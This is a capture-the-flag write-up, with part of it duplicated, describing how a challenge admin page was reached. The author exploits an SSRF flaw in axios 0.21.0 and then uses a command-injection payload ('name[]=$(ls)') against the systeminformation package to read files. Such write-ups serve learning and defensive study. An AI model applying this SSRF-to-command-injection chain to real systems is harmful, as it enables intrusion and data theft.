You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Protection of the admin section needs to be more robust...
Writeup
There is an api to fetch other url: http://192.46.237.106:3000/api/getUrl?url=http://example.com, I tried with some random ip and this one result in error: http://192.46.237.106:3000/api/getUrl?url=http://127.0.0.1
Then I tried to send request to proxy.corp.local but found nothing, stuck here for a while. A few moments later, I noticed the package name and the version in the response so I tired to google axios 0.21.0 vuln.
I tried few ip and domain but found nothing, stuck again. Later on, I went back and checked the chall description again: Protection of the admin section needs to be more robust....
So I tried: http://127.0.0.1/admin and to my surprise, I got access to admin page:
<html><head><title>System information</title></head><body><h2>Get OS Information</h2><buttononclick="retrieveOSInfo();false;">Retrieve</button><h2>Get service info</h2><inputtype="text" id="serviceName" value="nginx"><buttononclick="retrieveServiceInfo();false;">Retrieve</button><h2>Output</h2><textareaid="output"></textarea></body><script>functionretrieveOSInfo(){fetch('/api/admin/os_info').then(response=>{if(response.status==200){returnresponse.json();}throwError('Server is unavailable');},failResponse=>{printOutput('Server is unavailable');}).then(result=>{printApiResult(result);},errorMsg=>{printOutput(errorMsg);});}functionretrieveServiceInfo(){fetch('/api/admin/service_info?name='+encodeURIComponent(serviceName.value)).then(response=>{if(response.status==200){returnresponse.json();}throwError('Server is unavailable');},failResponse=>{printOutput('Server is unavailable');}).then(result=>{printApiResult(result[0]);},errorMsg=>{printOutput(errorMsg);});}functionprintApiResult(jsonObject){result='';for(const[key,value]ofObject.entries(jsonObject)){result+=`${key}: ${value}\n`;}printOutput(result);}functionprintOutput(content){output.value=content;}</script></html>
There are two hidden api endpoints, I tried both and here is the response for the service one:
Unicorn Networks
Description
Protection of the admin section needs to be more robust...
Writeup
There is an api to fetch other url:
http://192.46.237.106:3000/api/getUrl?url=http://example.com
, I tried with some random ip and this one result in error:http://192.46.237.106:3000/api/getUrl?url=http://127.0.0.1
Then I tried to send request to
proxy.corp.local
but found nothing, stuck here for a while. A few moments later, I noticed the package name and the version in the response so I tired to googleaxios 0.21.0 vuln
.Look what I found: Requests that follow a redirect are not passing via the proxy #3369
There is a SSRF vuln in this version so I created a simple proxy server:
I tried few ip and domain but found nothing, stuck again. Later on, I went back and checked the chall description again:
Protection of the admin section needs to be more robust...
.So I tried:
http://127.0.0.1/admin
and to my surprise, I got access to admin page:There are two hidden api endpoints, I tried both and here is the response for the service one:
I googled the keyword:
running":true,"startmode":"","pids"
and realized that it's from a package called systeminformationLet's do another round of search,
systeminformation vulnerability
. I found these two links:The POC is quite useful, we can do command injection via
name[]=$(ls)
But I don't know how to do reverse shell so I use another way, maybe stupid but works: https://stackoverflow.com/questions/15912924/how-to-send-file-contents-as-body-entity-using-curl
Got the flag in the end.
The text was updated successfully, but these errors were encountered: